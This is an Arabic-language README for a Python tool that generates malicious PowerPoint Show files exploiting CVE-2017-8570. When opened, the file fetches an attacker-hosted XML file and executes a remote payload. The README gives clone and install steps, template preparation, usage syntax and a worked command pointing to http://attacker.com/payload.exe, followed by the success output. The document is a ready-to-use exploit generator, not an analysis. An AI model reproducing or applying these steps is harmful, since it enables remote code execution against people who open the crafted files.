
مولّد ملفات ppsx لـ cve-2017-8570 (مبني على bhdresh/cve-2017-8570)
بقلم Temesgen Yibeltal [email protected] (استنادًا إلى كود من https://github.com/bhdresh/CVE-2017-8570 (تمت إزالته الآن))
ppsx-file-generator هي أداة بيثون تولّد ملف عرض تقديمي من PowerPoint ينفّذ كودًا من مصدر بعيد استنادًا إلى ملف موجود.
تولّد الأداة ملف عرض تقديمي من PowerPoint وملف xml بناءً على الإدخال المقدَّم. يصل ملف PowerPoint إلى ملف xml الذي يحتفظ بمعلومات ملف الحمولة (payload). يمكن للمهاجم استضافة ملف xml والحمولة على خادم محلي أو عام وتقديم عنوان URL الخاص بكل منهما كإدخال.
أولاً، احصل على الكود:
git clone https://github.com/temesgeny/ppsx-file-generator.git
ppsx-file-generator مكتوبة بلغة Python وتتطلب zipfile التي يمكن تثبيتها باستخدام Pip:
pip install zipfile
يتطلب برنامج Microsoft Office PowerPoint لتنفيذ هذه المهمة.
أولاً، افتح Microsoft Office PowerPoint وافتح 'template.ppsx'. افتح ملف العرض التقديمي الخاص بك وانسخ الأيقونة 'Coder.exe' من template.ppsx إلى الشريحة 1 في ملف PowerPoint الخاص بك. احفظ الملف كـ Power Point Show (.ppsx). ثم استخدم أداة البيثون على النحو التالي:
Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri
input_filename The input ppsx file name.
-o Output .ppsx file name, (inlcude the .ppsx).
-p The payload exe or sct file url.
It must be in an accessible web server. (Optional for xml file)
-x The full xml uri to be called by the ppsx file.
It must be in an accessible web server.(Required)
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully